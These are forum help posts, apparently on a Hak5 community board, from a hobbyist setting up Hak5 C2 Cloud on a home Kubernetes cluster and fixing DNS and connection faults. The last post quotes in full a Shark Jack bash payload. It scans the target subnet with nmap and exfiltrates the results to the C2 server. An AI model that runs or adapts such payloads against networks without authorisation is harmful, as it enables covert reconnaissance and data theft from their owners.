Peque

First of all -Thanks for replying Well, I'm still newbie trying to gain more knowledge. So sorry if I'm missing some critical information on what I mean with kubernetes/C2 Cloud server. This little setup is just a TuringPi2 as a little cluster for learning more. C2 Cloud Perspective - I'm trying to set it for a C2 cloud perspektive. Creating the kubernetes from the docker-compose file from this https://github.com/LindezaGrey/hak5c2 converting with kompose - gives the 3 attached files. - which i load into my kubernetes, but the hak5c2-deployment.yaml I could set the hostname for the instance hak5c2-deployment.yamlc2db-persistentvolumeclaim.yamlhak5c2-service.yaml So perhaps its just a small change - but it'll seems to I can't see it at the moment With my first login to the C2 kubernetes, I'm adding a line to my hostfile on my pineapple - the ip of the C2 as a FQDN - such as 192.168.200.15 c2.example.org c2 So now my C2 it self resolves the FQDN - so it'll should The C2 itself - After the C2 server is deployed on kubernetes, it'll only set a hostname for the C2-instance - called c2 - I can add the domain name as example.org to C2 Server /etc/hosts so it'll now resolve the FQDN - but still any created devices have this line in trhe beginning of the device.config. Creating the device.config files From my old C2 cloud - reating a device.config - shows the FQDN in the device.config: c2.example.org 8080 From my new Kubernetes C2 - creating a device.config - it'll only show hostname - and not the FQDN : c2 8080 c2*8080B _� instad of c2.example.org*8080B _� as it shows from the Old C2 Server running as a VM - in the encrypted file for the devices. This is the only way - I can resolve c2 - as the device.config file showing I should, This was created for making sure The devices can coonnect to C2.example.org and verifying that the ports etc are open. Well - and perhaps here my knowledge comes to an end and what I'm doing are confused. But when I logging to the c2 server in a browser it's with the FQDN(internal DNS on PFsense) The last steps on getting the right FQDN to the C2 server itself - so I can create the device files correctly (and have tried to changed the path in the device.config - but that'll not work either. So hopefully I've explained it a little bit further P

Hi Forum. for gaining more knowledge - I'm playing around with kubernetes - and trying to move my setup to k8s. Almost anything on the cloud is working as intended - I have a issue on the C2 server. When creating the deployment on Kubernetes it's only possible to set the hostname and not the FQDN. Is there any way to change this ? Only option is after the Server is deployed, but then the hostname are shown as the c2 and not the FQDN. After adding the static IP in the pineapple's /etc/hosts - so that the c2 resolves to the FQDN - But C2 still sets only hostname - and not hostname -f Is it possible to handle this issue in another way?

I have placed the device.config - in /etc/ Yes - My C2 is running https. I have also tried the default payload --> with just should test this C2EXFIL - but still not getting anything ton my C2 Cloud. THe only thing i cc-client-error are these 3 lines repeating [1646558183 !ERR INITSYNC ] Error in startup sync post [1646558183 !ERR MAIN ] Device startup sync failed. Retrying... [1646558188 !ERR CURL ] Error posting update to server... But other devices on the same network is working without problem. Well - Found the problem - Internal DNS Since this is just test setup at the moment, seperate network at home. /etc/resolv.conf --> only nameserver 127.0.0.1 Adding my local DNS Server ( PFsense firewall) - and now I'm able to connect to the C2 Cloud. Extra: Is it possible to make it add this DNS server automatickly - as a failover DNS, so if the default dns - 127.0.0.1 does not resolve - then add a speficied extra DNS server And thanks for the input - that gave me the answer

Hi Forum I've bought an essentialKit , and have the most of it running as expected. I've downloaded the payload from Hak5 Git repos - this payload --> https://github.com/hak5/sharkjack-payloads/tree/master/payloads/library/recon/Nmap-C2 The Sharkjack is updated to to latest Firmware - Version 1.1.0, and I can see the Sharkjack does everything that I want, the Loot are created etc. I can see that during execution of the payload, that the Sharkjack gets an IP on the target network - but nothing gets through to my C2 Cloud. As I can see - it should'n be an issue with my C2 Cloud - since I have Wifi Pineapple, lan Turtle and Squirrel running and connecting to C2 Cloud. How can I check this further, since as I can see - I can not SSH to the sharkjack during run of the payloads. And have tried reconfiguring my C2 Cloud settngs on the jack several times with out any luck. The Executed payload: #!/bin/bash # # Title: Nmap Payload for Shark Jack w/ C2 # Author: Hak5 (modifications from REDD) # Version: 1.1 # # All credit goes to Hak5 Team. I just through in a simple check for if # C2 is provisioned in the SharkJack. - If so, exfiltrate! # # Scans target subnet with Nmap using specified options. Saves each scan result # to loot storage folder. Exfiltrates all scans to C2 if provisioned. # # LED SETUP ... Obtaining IP address from DHCP # LED ATTACK ... Scanning # LED FINISH ... Scan Complete # # See nmap --help for options. Default "-sP" ping scans the address space for # fast host discovery. C2PROVISION="/etc/device.config" NMAP_OPTIONS="-sP --host-timeout 30s --max-retries 3" LOOT_DIR=/root/loot/nmap # Setup loot directory, DHCP client, and determine subnet LED SETUP mkdir -p $LOOT_DIR COUNT=$(($(ls -l $LOOT_DIR/*.txt | wc -l)+1)) NETMODE DHCP_CLIENT while [ -z "$SUBNET" ]; do sleep 1 && SUBNET=$(ip addr | grep -i eth0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//') done # Scan network LED ATTACK nmap $NMAP_OPTIONS $SUBNET -oN $LOOT_DIR/nmap-scan_$COUNT.txt # Exfiltrate Loot to Cloud C2 if [[ -f "$C2PROVISION" ]]; then LED SPECIAL # Connect to Cloud C2 C2CONNECT # Wait until Cloud C2 connection is established while ! pgrep cc-client; do sleep 1; done # Exfiltrate all test loot files FILES="$LOOT_DIR/*.txt" for f in $FILES; do C2EXFIL STRING $f Nmap-C2-Payload; done else # Exit script if not provisioned for C2 LED R SOLID exit 1 fi LED FINISH sleep 2 && halt Can I Just disable the last 2 lines - so I can SSh into the jack to see what and if there's an error while trying to connect to my C2 Cloud Since everything else is working as intended - I do not get why I can't get this Sharkjack to deliever to my C2 Cloud. Any ideas of what is wrong /P